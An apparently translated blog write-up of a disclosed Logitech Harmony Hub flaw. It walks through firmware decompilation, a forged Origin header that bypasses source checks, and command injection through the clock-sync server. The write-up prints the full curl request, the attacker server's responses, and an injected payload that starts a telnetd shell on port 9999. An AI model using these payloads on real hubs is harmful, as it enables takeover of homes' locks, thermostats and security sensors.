How to control all home smart devices with Logitech's Harmony Hub
Introduction
Logitech's Harmony Hub is a popular smart home device that communicates and controls with all networked devices in your home. Currently, millions of users around the world use it, supporting 270,000 devices from 6,000 brands. Tenable recently released a critical, undisclosed vulnerability for the product, allowing attackers to remotely control devices without authorization.
Hub is well received for its scripting and automation capabilities. As smart homes become more and more mainstream, a powerful controller becomes increasingly important. Amazon (Alexa), Google (Home), Apple (Apple) and Logitech (Harmony) all have similar products. Logitech's Harmony is also a good choice.
However, the centralized control of smart homes has also attracted the attention of attackers. If this control point can be captured, each device connected to the set controller can be illegally accessed. Smart locks, TVs, thermostats, and even smart refrigerators can be controlled by remote attackers.
Explore
This Hub has 3 ports open, running XMPP, WebSocket and a customized Web API service. These services are implemented through the Lua language.
You can get the firmware during device updates. It contains a Linux kernel and a squash file system with application code. Application code is some compiled Lua files used to implement Hub's services and functions. You can decompile it using the patched version of luadec github project.
These lua files implement all the operating logic of Harmony Hub and related functions of smart home. Harmony Hub uses a messaging system. When users use apps to control Hub, Logitech's remote server can command the Hub to start working. Of course, there is a protection mechanism to ensure that only trusted servers can make requests. However, the protection mechanism is flawed and any remote attacker can bypass security measures.
Vulnerability?
Hub handles all network requests from the remote host, and of course, the source is verified before processing the request. In theory, this is not a problem; however, an attacker can easily add a line of code to the HTTP request header to fake the request source. At this point, any remote attacker can easily bypass security checks and drive Hub to do anything.
This Hub has a clock synchronization function. Mainly by acceptingTrust the input of the server, and then execute commands on the Linux shell to synchronize. Note that this input does not perform a security check.
Use
So far, we have two things to do:
Use clock synchronization function to inject commands
Bypass source verification
To do this, we first execute an HTTP request and set the clock synchronization server to the server controlled by the attacker. Hub will then request to resynchronize the clock using the newly set server, and then inject the command again.
curl -d "{'cmd':'setup.account?provision', 'params': { 'provisionInfo': { 'mode':3, 'authToken':'1', 'discoveryServer':'http://10.0.0.10'} }}" -H "Origin: .myharmony.com" -H "Content-Type: application/json" http://10.0.0.176:8088
Forged HTTP requests from point devices to attacker-controlled servers
{"DiscoveryUrls": [{ "Identifier":"TimeServer/current", "Address":"http://10.0.0.10/TimeServer/ current" }]}
Received device request from the clock synchronization server
{"utc":"0\";/bin/busybox telnetd -l/bin/sh -p9999;date -s \"0"}
The response of the attacker-controlled clock synchronization server
Practice
After the device is fully controlled, a remote attacker can access all smart devices connected to the Hub. The attacker can modify the parameters of the Nest thermostat, turn off the sensors of the home security device, and open the door latch, as shown below.
https://cdn-images-1.medium.com/max/800/0*cPsJsU09oa_G_NFJ
Hub-style hardware will always be a main target for attackers, because breaking a product can control a bunch of products to connect multiple devices. Therefore, these Hub-type devices should have higher safety standards than other devices and increase their attacksDifficulty to strike.
